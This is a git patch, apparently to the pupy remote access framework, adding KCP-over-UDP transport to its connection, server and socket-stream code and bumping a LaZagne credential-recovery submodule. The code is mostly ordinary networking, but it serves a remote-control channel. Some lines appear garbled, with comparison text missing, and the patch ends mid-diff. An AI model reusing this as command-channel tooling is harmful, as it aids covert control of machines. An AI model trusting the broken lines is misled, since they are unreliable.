From 7413e4fba680fdceedbef73f996033c125121fb9 Mon Sep 17 00:00:00 2001 From: Oleksii Shevchuk Date: Sat, 30 Dec 2017 15:57:15 +0200 Subject: [PATCH] Initial KCP support --- client/requirements.txt | 1 + pupy/external/LaZagne | 2 +- pupy/network/lib/buffer.py | 7 +- pupy/network/lib/clients.py | 19 ++- pupy/network/lib/connection.py | 31 ++++ pupy/network/lib/servers.py | 59 ++++++-- pupy/network/lib/streams/PupySocketStream.py | 143 +++++++++++-------- pupy/network/lib/transports/dummy.py | 12 +- pupy/requirements.txt | 1 + 9 files changed, 193 insertions(+), 82 deletions(-) diff --git a/client/requirements.txt b/client/requirements.txt index a584a7ac..bf7bf115 100644 --- a/client/requirements.txt +++ b/client/requirements.txt @@ -4,3 +4,4 @@ psutil rsa netaddr tinyec +https://github.com/alxchk/pykcp diff --git a/pupy/external/LaZagne b/pupy/external/LaZagne index 2b7a8236..a1b0ff23 160000 --- a/pupy/external/LaZagne +++ b/pupy/external/LaZagne @@ -1 +1 @@ -Subproject commit 2b7a8236a1963d8fe541370fe7ff38df2c0deab1 +Subproject commit a1b0ff23e330d1ea598ccf8ccc2429c9f689f6ba diff --git a/pupy/network/lib/buffer.py b/pupy/network/lib/buffer.py index e81da35d..57f4eb6e 100644 --- a/pupy/network/lib/buffer.py +++ b/pupy/network/lib/buffer.py @@ -30,7 +30,12 @@ class Buffer(object): return True else: self.waiting.clear() - return self.waiting.wait(timeout) + + self.waiting.wait(timeout) + return len(self.buffer)>0 + + def wake(self): + self.waiting.set() def read(self, n=-1): """ diff --git a/pupy/network/lib/clients.py b/pupy/network/lib/clients.py index c89ffe20..0d68a0c2 100644 --- a/pupy/network/lib/clients.py +++ b/pupy/network/lib/clients.py @@ -185,16 +185,21 @@ class PupyUDPClient(PupyClient): def __init__(self, family = socket.AF_UNSPEC, socktype = socket.SOCK_DGRAM, timeout=3): self.sock=None super(PupyUDPClient, self).__init__() - self.family=family - self.socktype=socktype - self.timeout=timeout + self.family = family + self.socktype = socktype + self.timeout = timeout def connect(self, host, port): - self.host=host - self.port=port - family, socktype, proto, _, sockaddr = socket.getaddrinfo(host, port, self.family, self.socktype)[0] + self.host = host + self.port = port + + family, socktype, proto, _, sockaddr = socket.getaddrinfo( + host, port, self.family, self.socktype + )[0] + s = socket.socket(family, socktype, proto) s.settimeout(self.timeout) s.connect(sockaddr) - self.sock=s + s.setblocking(0) + self.sock = s return s, (host, port) diff --git a/pupy/network/lib/connection.py b/pupy/network/lib/connection.py index 6d2bcece..891cc3fd 100644 --- a/pupy/network/lib/connection.py +++ b/pupy/network/lib/connection.py @@ -98,6 +98,7 @@ class PupyConnection(Connection): if DEBUG_NETWORK: logging.debug('Sync request handled: {}'.format(seq)) + if seq in self._sync_events: del self._sync_events[seq] @@ -122,12 +123,19 @@ class PupyConnection(Connection): self._sync_events[seq] = Event() self._send(consts.MSG_REQUEST, seq, (handler, self._box(args))) + + if DEBUG_NETWORK: + logging.debug('Request submitted: {}'.format(seq)) + return seq def _async_request(self, handler, args = (), callback = (lambda a, b: None)): self._send_request(handler, args, async=callback) def _dispatch_reply(self, seq, raw): + if DEBUG_NETWORK: + logging.debug('Dispatch reply: {}'.format(seq)) + self._last_recv = time.time() sync = seq not in self._async_callbacks Connection._dispatch_reply(self, seq, raw) @@ -136,6 +144,9 @@ class PupyConnection(Connection): self._sync_events[seq].set() def _dispatch_exception(self, seq, raw): + if DEBUG_NETWORK: + logging.debug('Dispatch exception: {}'.format(seq)) + self._last_recv = time.time() sync = seq not in self._async_callbacks Connection._dispatch_exception(self, seq, raw) @@ -161,14 +172,34 @@ class PupyConnectionThread(Thread): else: self.lock = RLock() + if DEBUG_NETWORK: + logging.debug('Create connection thread') + self.connection = PupyConnection(self.lock, *args, **kwargs) Thread.__init__(self) self.daemon = True + if DEBUG_NETWORK: + logging.debug('Create connection thread completed') + + def run(self): + if DEBUG_NETWORK: + logging.debug('Run connection thread') + try: + if DEBUG_NETWORK: + logging.debug('Init connection') + self.connection._init_service() + + if DEBUG_NETWORK: + logging.debug('Init connection complete. Acquire lock') + with self.lock: + if DEBUG_NETWORK: + logging.debug('Start serve loop') + while not self.connection.closed: self.connection.serve(10) diff --git a/pupy/network/lib/servers.py b/pupy/network/lib/servers.py index 6ef21c51..ed2171af 100644 --- a/pupy/network/lib/servers.py +++ b/pupy/network/lib/servers.py @@ -11,6 +11,7 @@ from rpyc.core.stream import Stream from buffer import Buffer import socket +import select import errno import random @@ -221,7 +222,7 @@ class PupyUDPServer(object): self.service=service self.active=False - self.clients={} + self.clients = {} self.sock=None self.hostname=kwargs['hostname'] self.port=kwargs['port'] @@ -245,22 +246,53 @@ class PupyUDPServer(object): except socket.error as msg: s.close() s = None - last_exc=msg + last_exc = msg continue break - self.sock=s + self.sock = s if self.sock is None: raise last_exc def accept(self): try: - data, addr = self.sock.recvfrom(40960) - if data: - self.dispatch_data(data, addr) - else: - self.clients[addr].close() + minwait = None + now = None + unsent = False + + for addr, client in self.clients.iteritems(): + if not minwait: + now = client.clock + minwait = client.update_in(now) + else: + cwait = client.update_in(now) + if cwait < minwait: + minwait = cwait + + if client.unsent > 0: + unsent = True + + if minwait is not None: + minwait = minwait / 1000.0 + + if not unsent: + minwait = 1 + + r, _, _ = select.select([self.sock], [], [], minwait) + if r: + data, addr = self.sock.recvfrom(40960) + if data: + self.dispatch_data(data, addr) + else: + self.clients[addr].close() + del self.clients[addr] + except Exception as e: logging.error(e) + raise + + def on_close(self, addr): + self.clients[addr].wake() + del self.clients[addr] def dispatch_data(self, data_received, addr): host, port=addr[0], addr[1] @@ -274,8 +306,10 @@ class PupyUDPServer(object): except AuthenticationError: logging.info("failed to authenticate, rejecting data") raise + self.clients[addr] = self.stream_class( - (self.sock, addr), self.transport_class, self.transport_kwargs, client_side=False + (self.sock, addr), self.transport_class, self.transport_kwargs, + client_side=False, close_cb=self.on_close ) t = PupyConnectionThread( @@ -288,9 +322,8 @@ class PupyUDPServer(object): ) t.daemon=True t.start() - with self.clients[addr].downstream_lock: - self.clients[addr].buf_in.write(data_received) - self.clients[addr].transport.downstream_recv(self.clients[addr].buf_in) + + self.clients[addr].submit(data_received) def start(self): self.listen() @@ -308,6 +341,6 @@ class PupyUDPServer(object): self.close() def close(self): - self.active=False + self.active = False if self.sock: self.sock.close() diff --git a/pupy/network/lib/streams/PupySocketStream.py b/pupy/network/lib/streams/PupySocketStream.py index 51726352..1f840703 100644 --- a/pupy/network/lib/streams/PupySocketStream.py +++ b/pupy/network/lib/streams/PupySocketStream.py @@ -14,6 +14,7 @@ import errno import logging import traceback import zlib +import kcp from rpyc.lib.compat import select, select_error, BYTES_LITERAL, get_exc_errno, maxint import threading @@ -84,12 +85,12 @@ class PupySocketStream(SocketStream): self.downstream_lock=threading.Lock() self.transport=transport_class(self, **transport_kwargs) - self.on_connect() self.MAX_IO_CHUNK=32000 - self.compress = True + self.on_connect() + def on_connect(self): self.transport.on_connect() self._upstream_recv() @@ -152,8 +153,6 @@ class PupySocketStream(SocketStream): def read(self, count): try: - if len(self.upstream)>=count: - return self.upstream.read(count) while len(self.upstream)0 or self._poll_read(timeout=timeout) + return len(self.upstream)>0 or self._poll_read(timeout) def close(self): - pass + if self.close_callback: + self.close_callback(self.dst_addr) - @property - def closed(self): - return self.close() + self.closed = True def _upstream_recv(self): """ called as a callback on the downstream.write """ if len(self.downstream)>0: - tosend=self.downstream.read() - sent=self.sock.sendto(tosend, self.dst_addr) - if sent!=len(tosend): - print "TODO: error: all was not sent ! tosend: %s sent: %s"%(len(tosend), sent) + data = self.downstream.read() + self.kcp.send(data) def _poll_read(self, timeout=None): if not self.client_side: - return self.upstream.wait(timeout) - self.sock.settimeout(timeout) - try: - buf, addr=self.sock.recvfrom(self.MAX_IO_CHUNK) - except socket.timeout: - self.total_timeout+=timeout - if self.total_timeout>300: - self.sock.close() # too much inactivity, disconnect to let it reconnect - return False - except socket.error: - ex = sys.exc_info()[1] - if get_exc_errno(ex) in (errno.EAGAIN, errno.EWOULDBLOCK): - # windows just has to be a b**ch - return True - self.close() - raise EOFError(ex) - if not buf: - self.close() - raise EOFError("connection closed by peer") - self.buf_in.write(BYTES_LITERAL(buf)) - self.total_timeout=0 - return True + # In case of strage hangups change None to timeout + return self.upstream.wait(None) + + buf = self.kcp.recv() + if buf is None: + if timeout is not None: + timeout = int(timeout) * 1000 + + buf = self.kcp.pollread(timeout) + + if buf: + self.buf_in.write(buf) + self.total_timeout = 0 + return True + + return False def read(self, count): try: - if len(self.upstream)>=count: - return self.upstream.read(count) - while len(self.upstream)